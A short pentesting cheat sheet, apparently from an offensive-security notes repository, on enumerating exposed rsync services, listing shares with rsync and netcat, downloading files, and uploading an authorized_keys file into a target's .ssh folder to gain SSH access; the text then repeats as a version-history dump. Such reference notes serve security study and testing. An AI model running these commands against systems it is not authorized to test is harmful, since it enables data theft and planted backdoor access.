killchain-compendium/Enumeration/rsync.md

# rsync

* [netspi article]( https://www.netspi.com/blog/technical/network-penetration-testing/linux-hacking-case-studies-part-1-rsync/)
* [hacktricks' rsync](https://book.hacktricks.xyz/pentesting/873-pentesting-rsync)

## Enumerate

```sh
rsync <target-IP>::
rsync <target-IP>::files
rsync <target-IP>::files/foo/
```
### via netcat
* Another way is the following
```sh
nc -vn $TARGET_IP 873
```
* Repeat the identical handshake, e.g.
```
@RSYNCD: 31.0
```
* List all directories
```sh
#list
```

## Downloads

```sh
rsync <user>@<target-IP>::/files/foo/bar.txt .
rsync -r <user>@<target-IP>::/files/foo .
```

## Uploads

```sh
rsync authorized_keys <user>@<target-IP>::/files/foo/.ssh/
rsync -r documents <user>@<target-IP>::/files/foo/
```
restructured enumeration 2022-11-13 01:16:26 +01:00			`# rsync`

			`* [netspi article]( https://www.netspi.com/blog/technical/network-penetration-testing/linux-hacking-case-studies-part-1-rsync/)`
			`* [hacktricks' rsync](https://book.hacktricks.xyz/pentesting/873-pentesting-rsync)`

			`## Enumerate`

			```sh
			`rsync <target-IP>::`
			`rsync <target-IP>::files`
			`rsync <target-IP>::files/foo/`
			```
			`### via netcat`
			`* Another way is the following`
			```sh
			`nc -vn $TARGET_IP 873`
			```
			`* Repeat the identical handshake, e.g.`
			```
			`@RSYNCD: 31.0`
			```
			`* List all directories`
			```sh
			`#list`
			```

			`## Downloads`

			```sh
			`rsync <user>@<target-IP>::/files/foo/bar.txt .`
			`rsync -r <user>@<target-IP>::/files/foo .`
			```

			`## Uploads`

			```sh
			`rsync authorized_keys <user>@<target-IP>::/files/foo/.ssh/`
			`rsync -r documents <user>@<target-IP>::/files/foo/`
			```